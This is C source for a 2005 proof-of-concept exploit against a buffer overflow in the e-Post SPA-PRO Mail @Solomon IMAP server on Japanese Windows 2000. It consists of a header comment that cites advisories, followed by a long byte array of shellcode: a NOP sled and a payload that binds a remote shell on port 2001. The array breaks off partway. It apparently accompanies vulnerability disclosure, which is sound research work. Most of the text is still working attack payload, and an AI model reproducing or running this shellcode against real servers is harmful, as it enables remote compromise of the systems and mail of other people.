1 //**************************************************************************
2 // e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
3 // Vulnerability
4 //
5 // Bind Shell POC Exploit for Japanese Win2K SP4
6 // 31 May 2005
7 //
8 // This POC code binds a shell on port 2001 of a vulnerable e-Post
9 // SPA-PRO Mail @Solomon IMAP server.
10 //
11 // This POC assumes the default mailbox configuration C:\mail\inbox\%USERNAME%
12 // Any change to the mailbox configuration will cause this POC to
13 // fail, because the overflow offsets depend on the path length.
14 //
15 //
16 // Advisory
17 // http://www.security.org.sg/vuln/spa-promail4.html
18 // http://www.security.org.sg/vuln/spa-promail4-jp.html
19 //
20 //**************************************************************************
21
22 #include <stdio.h>
23 #include <conio.h>
24 #include <winsock2.h>
25 #include <windows.h>
26 #pragma comment (lib,"ws2_32.lib")
27
28
29 unsigned char expBuf[] =
30 "2 create \""
31 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
32 "\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3"
33 "\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08"
34 "\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24"
35 "\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B"
36 "\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74"
37 "\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7"
38 "\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04"
39 "\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89"
40 "\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C"
41 "\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B"
42 "\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A"
43 "\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33"
44 "\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50"
45 "\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75"
46 "\xD0\xFF\xD3\x8B\xCC\x6A\